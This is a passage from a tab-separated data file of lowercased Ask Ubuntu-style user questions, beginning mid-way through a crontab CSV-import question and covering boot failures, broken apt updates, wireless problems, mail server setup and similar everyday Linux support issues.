-r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 5 6 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 4 7 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 6 8 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 5 9 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 4 10 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 6 11 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 5 12 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) any help would be much appreciated josh
327980	ubuntu starting from live cd , flashing screen ?	i got sick and tired of windows 8 , so i decided i was gon na install ubuntu . i burned 12.04 lts to a disc , but it just stayed there with a black screen . sometimes i 'd get lucky and have a flashing screen from blac to purple , other times i 'd get really lucky and have a solid screen , and if i moved the mouse up , i could see the cursor there . i tried putting nomodeset in the boot commands , but it says something along the lines of `` command not recognized '' and comes up with the flashing screen . the same stuff happens when i use a live usb with 13.04 . i am using a dell xps 8700 . i tried turning off secure boot , but the same thing happens . if anyone can help me , i gove you my thanks in advance . -zakee
327981	setting up a intrusion system	i am trying to set up a intrusion system for 12.04 lts and was pointed in the direction of using pam to do so . how can i setup pam and is there any other intrusion system out there for ubuntu ?
327985	i need help updating	i am currently running ubuntu 10.10 and i would lie to update . for some reason my computer will not let get into the bios setup to install from the dvd of ubuntu . please help
327989	scp stalls only wen limiting bandwidth	when i do n't limit my bandwidth it works fine , but i want to limit my bandwidth otherwise no one else on the network can access the internet because i am using up every available byte of bandwidth , once i limit my bandwidth my scp upload stalls out . any suggestions ?
327990	another broken apt question	i 'm having trouble with updating my system . update manager says `` the package system is broken '' and to try apt-get install -f. in details it complains that : the following packages have unment dependencies : linux-header-3.2.0-51-generic : depends : linux-headers-3.2.0-51 but it is not installed . apt-get install -f fails with : dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-51_3.2.0-51.77_all.deb unable to create /usr/src/ ... ./arch/mips/includes ... ./module.h.dpkg-new whilst ... . no space left on device /usr has 500mb available , and watching df -h during the install shows that it never goes above 91 % used , the other mount points are unaffected , so i do n't think this is genuinely an out of space issue . various combinations of apt-get update , install , clean etc . as recommended in the many other questions on this subject do n't seem to work . as far as i can tell , none of the other people with the same problem ever managed to find a fix . any ideas ?
327995	how to fetch `` keyboard layout indicator '' when it get disappeared	i 'm not a native born english speaker . so i write in two languages on the web . i added both layout ( english and the other ) and it works good . when i log out the system and log in again , `` keyboard layout indicator '' get disappeared and i 'm not able to change keyboard layout even by using keyboard shortcut ( alt + shift ) my question is : how can i fetch `` keyboard layout indicator '' again to be able to switch between layouts ? what is the name of `` keyboard layout indicator '' ( to exec in terminal ) ?
327999	how to install the hl 5470dw driver	there are two drivers on the website : http : //welcome.solutions.brother.com/bsc/public/us/us/en/dlf/download_index.html ? reg=us & c=us & lang=en & prod=hl5470dw_us_eu_as & dlid= & flang=english & os=128 & type2=-1 the lpr driver and the cups wrapper driver . which to choose ? and what is the step by step to install it ? im running ubuntu 13.04 32 bit
328003	how to join a ubuntu 12.04 machine to a windows domain	no matter how you try , sometimes you ca n't escape the clutches of microsoft and windows . i am trying to add my ubuntu 12.04 to my domain at work and make sure my user profile have sudo privileges .
328005	new windows 8 branded computer , fresh ubuntu installation	i bought a new computer with the windows 8 so i tried installing ubuntu 13.04 . however when installation is finished and you get the final `` remove cd and hit enter '' part of the installation , that 's is where my game ends . you can remove the cd ( you have to do it manually , it does n't pop out ) but after that game-over . ended up having to hard-reset . when the computer restarts an all black screen echoes back : reboot and select proper boot device or insert boot media ... everyone points to the boot repair disk to solve the problems , but when i do that it gives me the same error message about `` reboot and select proper ... '' i 'm wondering where , or what i have done wrong .
328011	mount.ntfs process taking up cpu	recently in ubuntu desktop 12.04 , i 've found ( in the top command ) that the process mount.ntfs has been constantly running , and taking up about 15 % of my cpu . i checked to make sure that i had n't mounted either the c : / drive that ubuntu is installed on ( with wubi ) or any of the other ntfs partitions , but none were mounted . this is a recently occurring problem , what is the process and is it safe to kill it ?
328012	windows xp machine is password protected	somebody gave me a very old hp omnibook 500 laptop with windows xp professional on it . it was a corporate pc from hp and it was given to me by a former executive of the company . but he does n't remember the password . i want to wipe it and put ubuntu on it . but i ca n't get past the password screen and i ca n't get the machine to boot from the usb drive . i changed the boot order in the bios , but it just boots into windows anyway and i get stuck . has anybody else here had this problem and found a work-around ?
328013	reformatted windows 8 laptop not loading installed ubuntu 13.04 x64	i have a new ( er ) hp pavillion g6 , and i completely wiped the hard drive to install ubuntu primarily , with a small windows 7 partition . i created a partition for `` / '' , the `` /home '' directory , a little for swap , and one for the windows section . finished installing , restarted , it says `` boot device not found , please install operating system . what steps should i take to install ubuntu and windows 7 ? thank you for any help offered .
328018	system76 laptops ? good or bad ?	i would like to know how great these ubuntu ready laptops are . does anyone have any personal experience with them ?
328022	are some hdd 's incompatible with linux ?	having spent nearly 20 hours over the last two days trying to install two different distros of linux ( settling my attentions on ubuntu ) on two seperate western digital wd blue wd10ezex ( 1tb ) hard drives , i 've started to wonder whether or not certain hard drives are compatible with installations of linux . and , if certain hard drives are incompatible , how would you go about telling whether or not they were ? would it be 'labelled on the box ' , so to speak ?
328027	how to successfully install osu ! using wine1.6 ?	how can i completely and successfully install osu ! using wine1.6 ? here is the download link in case anyone wanted to try . sorry for the lack of information but thats all i could really think of adding . thanks !
328029	display part of fortune in different color	i created a custom fortune file for my favourite tweets in the format tweet and then the @ username in a new line . an example is : '' you 've changed . '' `` yeah i know , i 'm a transformer . '' @ letsquotecomedy i want to display the tweet in a different color , say white , and the @ username in another color , like black . how can i do this in the terminal ? also , i would like to put that in my .bashrc file .
328031	awn main menu crashed , wo n't restart	i restarted my pc , and the icon in the bottom left of the screen is a frowny face . when i hoover on it it says `` whoops ! the applet crashed . click to restart it . '' i click on it , the circle moves around , then the frowny face is back . i 've tried right-clicking on the rest of the bar and going into the config files , but i did not find anything out of place . what do i do from here ?
328036	deleting a stubborn folder	i am trying to delete three files relating to a program install . i am listed as owner , and have all permissions , none of them are root files , they are all in the home folder . i tried deleting them normally and got the error , file can not be deleted . after a little searching i found the following thread here how do i remove a folder ? i have tried all of those suggestions , i type the information into the terminal , click enter , put in the password , click enter , and get the normal prompt , but the file is not deleted . this program did not install correctly and i am trying to reinstall , but it keeps telling me files can not be copied because of these three files . what else can i do ?
328044	minecraft frame tearing	i 've been trying to play minecraft in ubuntu . under both the unity and gnome3 window managers , i notice serious frame tearing when in fullscreen mode . is there any way to fix this ?
328046	how to use bootable usb on an ubuntu machine	let me clarify . my machine had ubuntu 12.04.2 lts . well it crashed and now i 'm burning the 32-bit version ( yes i 'm sure my machine is 32-bit ) of 13.04 iso onto my flash drive , using a windows vista computer . when i plug in my drive into my ubuntu computer and hit the power button , what do i do ? is there a secret key i need to push on boot-up for the option to boot from a usb drive ? thanks , s
328049	wireless not working after update	after installing a bunch of updates to ubuntu 12.04 , my wireless connection stopped working . however , i found that i could access other wireless networks ; i just could n't access the one i had been using before the update . is there any way to completely remove a wireless network and add it back in again so that it will be like a `` new '' wireless network and i 'll be able to use it ? ( i tried deleting and adding it back in `` edit connections '' but this did n't work . ) or is there any other way to solve this problem ? thanks . update : i removed the network connection that was not working using the command `` sudo rm /etc/networkmanager/system-connections/name-of-connection '' and then confirmed that it was removed by generating a list of all the network connections . however , that did n't work . for `` cat /etc/lsb-release ; uname -a '' , i got distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.2 lts '' linux aspire4830t 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:48:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux for `` lspci -nnk | grep -ia2 net '' , i got 02:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) subsystem : acer incorporated [ ali ] device [ 1025:054f ] kernel driver in use : atl1c 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9287 wireless network adapter ( pci-express ) [ 168c:002e ] ( rev 01 ) subsystem : foxconn international , inc. device [ 105b : e034 ] kernel driver in use : ath9k for `` lsusb '' , i got bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 064e : d250 suyin corp. for `` iwconfig '' , i got eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' ubcsecure '' mode : managed frequency:2.437 ghz access point : a0 : cf:5b : a3 : df:92 bit rate=117 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-39 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:9 invalid misc:2 missed beacon:0 for `` rfkill list all '' , i got 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : no hard blocked : no 2 : acer-bluetooth : bluetooth soft blocked : yes hard blocked : no for `` lsmod '' , i got module size used by ath3k 12969 0 btusb 22432 0 pci_stub 12623 1 vboxpci 23237 0 vboxnetadp 25671 0 vboxnetflt 23479 0 snd_hda_codec_hdmi 32476 1 snd_hda_codec_conexant 62363 1 vboxdrv 282562 3 vboxpci , vboxnetadp , vboxnetflt coretemp 13642 0 kvm_intel 137888 0 kvm 422160 1 kvm_intel joydev 17694 0 acer_wmi 32845 0 sparse_keymap 13891 1 acer_wmi xt_hl 12522 6 ip6t_rt 12559 3 nf_conntrack_ipv6 14107 7 nf_defrag_ipv6 13413 1 nf_conntrack_ipv6 ipt_reject 12577 1 xt_log 17454 9 snd_hda_intel 34063 3 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec xt_limit 12712 12 xt_tcpudp 12604 18 snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec uvcvideo 78117 0 videobuf2_core 33025 1 uvcvideo videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc xt_addrtype 12714 4 xt_state 12579 14 microcode 23030 0 snd_seq_midi 13325 0 ip6table_filter 12816 1 snd_rawmidi 30750 1 snd_seq_midi ip6_tables 27686 2 ip6t_rt , ip6table_filter snd_seq_midi_event 14900 1 snd_seq_midi nf_conntrack_netbios_ns 12666 0 nf_conntrack_broadcast 12590 1 nf_conntrack_netbios_ns nf_nat_ftp 12705 0 nf_nat 25646 1 nf_nat_ftp nf_conntrack_ipv4 14531 9 nf_nat snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event nf_defrag_ipv4 12730 1 nf_conntrack_ipv4 arc4 12530 2 nf_conntrack_ftp 13453 1 nf_nat_ftp nf_conntrack 83300 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp mei 41410 0 iptable_filter 12811 1 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq ip_tables 27474 1 iptable_filter x_tables 29892 12 xt_hl , ip6t_rt , ipt_reject , xt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables ath9k 133095 0 psmouse 102506 0 mac80211 555272 1 ath9k ath9k_common 14054 1 ath9k ath9k_hw 399752 2 ath9k , ath9k_common ath 24124 3 ath9k , ath9k_common , ath9k_hw serio_raw 13216 0 snd 83674 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device lpc_ich 17145 0 cfg80211 208382 3 ath9k , mac80211 , ath soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm rtsx_pci_ms 13181 0 memstick 16606 1 rtsx_pci_ms bnep 18240 2 parport_pc 32867 0 rfcomm 47562 0 bluetooth 211860 12 ath3k , btusb , bnep , rfcomm ppdev 17114 0 ext2 73799 1 mac_hid 13254 0 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp dm_crypt 23126 1 rtsx_pci_sdmmc 17801 0 ghash_clmulni_intel 13221 0 aesni_intel 51134 26 cryptd 20531 10 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel atl1c 42092 0 ahci 25869 2 libahci 27338 1 ahci i915 535221 3 drm_kms_helper 49259 1 i915 drm 290595 4 i915 , drm_kms_helper rtsx_pci 33680 2 rtsx_pci_ms , rtsx_pci_sdmmc i2c_algo_bit 13565 1 i915 video 19653 2 acer_wmi , i915 wmi 19257 1 acer_wmi
328050	how to set up a mail server which i can then use with email clients ?	i 'm trying to set up a mail server on my ubuntu 12.04 box from linode . the box currently runs apache , mysql and php and runs a few of my websites , and i want to set up an email account like myname @ mydomain.com . in the interest of learning , i 'd like to go through the painful task of setting up my own mail server . i 've seen lots of suggestions on how to do so , most involve using postfix and dovecot , but i 'm really struggling to understand : what is the difference is between both ? how to set them up properly to work together ? i just want a mail server running imap which i can use a mail client like thunderbird with .
328058	ubuntu 13.04 not booting after clean installation	i have just installed ubuntu 13.04 but it doesnt boot ( i 'm using `` try ubuntu '' option ) . i downloaded the iso that corresponds to my computer ( amd x64 ) and i made a usb device bootable using the universal usb installer as http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows suggests . the installation went perfectly but after rebooting my computer without the usb device a black screen appears with the next message : `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' and i ca n't get out of there ! ! i have read many posts all over the internet with a similar problem and i have tried many things such as reinstalling ubuntu ( kinda obvious ) , redownloading and reburning to the usb and reinstalling ( or at least i tried ) again and i ca n't get the problem solved . i have also tried using boot repair and it was supossed to fix my problem but it did n't , i ran the recommended repair and this is the link it generated : paste.ubuntu.com/5942067 . i thing i 'm getting crazy lol this are the specs of my computer : motherboard : asus m5a97 processor : amd phenom ( tm ) ii x4 960t processor ă 4 ram : 4gb and this is how i specify the partitions : * efi partition : 60mb beginning primary /boot : 100mb beginning primary ext4 swap : 2gb beginning logic / : 70gb beginning logic ext4 /home : 179gb beginning logic ext4 as a detail i used to have ubuntu 12.04 and i never had any trouble . after that i tried debian and fedora but now i want to get back to ubuntu but now 13.04 i hope someone can help me please ! ! d :
328059	black screen after 13.04 . how do i get the display back through the command line	this is a common problem with ubuntu . if i open the command line , something pops up really fast that says the bios disabled something . it let me login on the command line . i tried a bunch of commands that i thought would have opened or updated my bios . nothing worked . is there a way i can get my display working again through the command line ?
328061	ubuntu ca n't detecte windows 8	i have acer-aspire v5-571g laptop with pre-installed windows 8 . when i try to install ubuntu by wubi give me error message . so i installed it from usb while i 'm installing , it doesn’t detect windows 8 . when `` allocate drive space '' ( step ) i choose the ’something else’ option & install it alongside windows 8 . when restart my laptop ubuntu start immediately although windows 8 still existing . how can i login windows 8 ? some of wubi error message : 08-02 17:16 debug tasklist : # # # # finished get_file_md5 08-02 17:16 error commonbackend : invalid md5 for iso c : \ubuntu\install\installation.iso ( 8d72e2db7e72e13813731eab37a14d26 ! = 89c665e577c80ae95cd9a01c7bcb0319 ) none 08-02 17:16 debug tasklist : # # # finished check_iso 08-02 17:16 debug tasklist : # # finished use_cd 08-02 17:16 debug tasklist : # # running extract_kernel ... 08-02 17:16 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files 08-02 17:16 debug tasklist : # cancelling tasklist 08-02 17:16 debug tasklist : # finished tasklist 08-02 17:16 error root : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 122 , in select_task file `` \lib\wubi\application.py '' , line 228 , in run_cd_boot file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files thanks in advance . sorry for my poor english .
328069	can i install ubuntu 32 bit in a 64 bit machine ?	i have a windows 8 64 bit machine ( asus n56vj ) and i was asked to install a 32 bit linux os at the university for a programming course . the main problem is that i 'm not able to boot from cd ( already downloaded and burned ubuntu in the cd ) and if i try wubi it will install the 64 bit version . i also tried with a program called easybcd using the wubi disk image but it still does n't work . if any of you know how i can fix this i 'll be in your debt ! thank you very much !
328072	do-release-upgrade to 13.04 crashed	i did a do-release-upgrade to upgrade from my 12.10 to 13.04 ubuntu . the download for 680 mb files were completed successfully . after 10-15 minutes of running , i noticed that the desktop windows got slow , alt tab , switch workspace etc were n't responding . i could open the terminal but no icons to close , minimize and restore . i still let it run for another 6 hours and final with no change i rebooted the system . on reboot it did show ubuntu 13.04 but all the mentioned problems still persist and it also shows that compiz crashed during installation . now how do i run the os upgrade files again without downloading them . it seem ubuntu is convinced that the os upgrade has completed but then i am not sure if it is only the compiz or there are other files also that did not get installed because of this . edit : so as advised i ran the update-manager-text from terminal but still some errors . also after running sudo dkpg -- configure -a the above problems still persist . sudo update-manager-text [ sudo 